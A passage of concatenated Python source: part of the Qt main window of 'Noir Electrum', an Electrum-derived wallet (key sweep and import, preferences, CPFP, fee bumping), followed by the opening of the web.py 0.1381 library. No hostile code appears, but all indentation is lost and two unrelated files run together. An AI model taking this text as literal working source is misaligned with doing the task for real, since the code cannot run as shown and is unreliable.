address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 NOR = 1000 mNOR. 1 mNOR = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Noir Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Noir Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
web.py
|
#!/usr/bin/env python
"""web.py: makes web apps (http://webpy.org)"""
__version__ = "0.1381"
__revision__ = "$Rev: 72 $"
__license__ = "public domain"
__author__ = "Aaron Swartz <me@aaronsw.com>"
__contributors__ = "see http://webpy.org/changes"
from __future__ import generators
# long term todo:
# - new form system
# - new templating system
# - unit tests?
# todo:
# - get rid of upvars
# - break up into separate files
# - provide an option to use .write()
# - allow people to do $self.id from inside a reparam
# - add sqlite support
# - convert datetimes, floats in WebSafe
# - locks around memoize
# - fix memoize to use cacheify style techniques
# - merge curval query with the insert
# - figure out how to handle squid, etc. for web.ctx.ip
import os, os.path, sys, time, types, traceback, threading
import cgi, re, urllib, urlparse, Cookie, pprint
from threading import currentThread
from tokenize import tokenprog
iters = (list, tuple)
if hasattr(__builtins__, 'set') or (
hasattr(__builtins__, 'has_key') and __builtins__.has_key('set')):
iters += (set,)
try:
from sets import Set
iters += (Set,)
except ImportError:
pass
try:
import datetime, itertools
except ImportError:
pass
try:
from Cheetah.Compiler import Compiler
from Cheetah.Filters import Filter
_hasTemplating = True
except ImportError:
_hasTemplating = False
try:
from DBUtils.PooledDB import PooledDB
_hasPooling = True
except ImportError:
_hasPooling = False
# hack for compatibility with Python 2.3:
if not hasattr(traceback, 'format_exc'):
from cStringIO import StringIO
def format_exc(limit=None):
strbuf = StringIO()
traceback.print_exc(limit, strbuf)
return strbuf.getvalue()
traceback.format_exc = format_exc
## General Utilities
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
"""removes the string `remove` from the right of `text`"""
return _strips('r', text, remove)
def lstrips(text, remove):
"""removes the string `remove` from the left of `text`"""
return _strips('l', text, remove)
def strips(text, remove):
"""removes the string `remove` from the both sides of `text`"""
return rstrips(lstrips(text, remove), remove)
def autoassign(self, locals):
"""
Automatically assigns local variables to `self`.
Generally used in `__init__` methods, as in:
def __init__(self, foo, bar, baz=1): autoassign(self, locals())
"""
#locals = sys._getframe(1).f_locals
#self = locals['self']
for (key, value) in locals.iteritems():
if key == 'self':
continue
setattr(self, key, value)
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
instead of `obj['foo']`. Create one by doing `storage({'a':1})`.
"""
def __getattr__(self, key):
if self.has_key(key):
return self[key]
raise AttributeError, repr(key)
def __setattr__(self, key, value):
self[key] = value
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
d doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
Similarly, if the value has a `value` attribute, `storify will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
"""
def getvalue(x):
if hasattr(x, 'value'):
return x.value
else:
return x
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
class Memoize:
"""
'Memoizes' a function, caching its return values for each input.
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args, **keywords):
key = (args, tuple(keywords.items()))
if key not in self.cache:
self.cache[key] = self.func(*args, **keywords)
return self.cache[key]
memoize = Memoize
re_compile = memoize(re.compile) #@@ threadsafe?
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
def __init__(self):
self.match = None
def __call__(self, match):
self.match = match
return ''
def re_subm(pat, repl, string):
"""Like re.sub, but returns the replacement _and_ the match object."""
compiled_pat = re_compile(pat)
proxy = _re_subm_proxy()
compiled_pat.sub(proxy.__call__, string)
return compiled_pat.sub(repl, string), proxy.match
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
For example, `list(group([1,2,3,4], 2))` returns `[[1,2],[3,4]]`.
"""
if not hasattr(seq, 'next'):
